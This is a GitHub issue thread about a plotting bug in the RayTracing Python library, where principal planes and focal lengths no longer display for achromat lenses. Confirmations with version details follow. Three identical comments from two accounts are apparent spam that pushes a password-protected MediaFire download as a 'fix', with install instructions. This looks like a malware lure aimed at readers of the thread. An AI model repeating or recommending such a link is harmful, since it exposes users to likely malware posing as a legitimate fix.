### ISSUE TITLE
At some point in time, something broke the Principal planes, EFF, BFF, FFL, display on achromat lenses

### ISSUE THREAD

**Issue by dccote** [DCC-Lab/RayTracing#477]
`python -m raytracing -e 16`

<img width="944" alt="image" src="https://github.com/user-attachments/assets/1b95881c-3af7-4d96-a1d3-63c69134bd3f">

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JLBegin** [comment]
Same result on old master 3baccd273d7ba69e857898977cda0681ecb938cb
using matplotlib 3.7 and python 3.8.10

![image](https://github.com/user-attachments/assets/1d8158f0-659a-464f-8f4d-d9da279a66cc)

**Comment by Shobhit043** [comment]
the issue still seems to be there. i just installed the module and used code provided in the documentation
![download](https://github.com/user-attachments/assets/183955f9-90a0-4042-b436-fafe74bbdf85)
